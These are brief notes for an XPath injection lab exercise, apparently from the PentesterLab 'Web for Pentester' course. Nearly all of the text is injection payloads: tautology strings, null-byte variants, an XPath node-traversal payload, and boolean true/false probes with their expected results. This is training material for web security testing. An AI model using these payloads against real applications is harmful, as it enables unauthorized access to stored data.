https://pentesterlab.com/exercises/web_for_pentester/course

# Orig request
http://xxx.xxx.xxx.xxx/xml/example2.php?name=hacker

# Attacks - Run org request then run attacks, look for differences. You may see more data than expected.
http://xxx.xxx.xxx.xxx/xml/example2.php?name=hacker'%20or%201=1%20or%20'a'='a
http://xxx.xxx.xxx.xxx/xml/example2.php?name=hacker' or 1=1 or 'a'='a

# Attacks used for testing
xxx'%20or%201=1%20or%20'a'='a
xxx'%20or%201=1%20or%20'a'='a%00
xxx'%20or%201=1]/parent::*/child::node()%00

xxx' and '1'='1 and you should get the same result.
xxx' or '1'='0 and you should get the same result.
xxx' and '1'='0 and you should not get any result.
xxx' or '1'='1 and you should get all results.
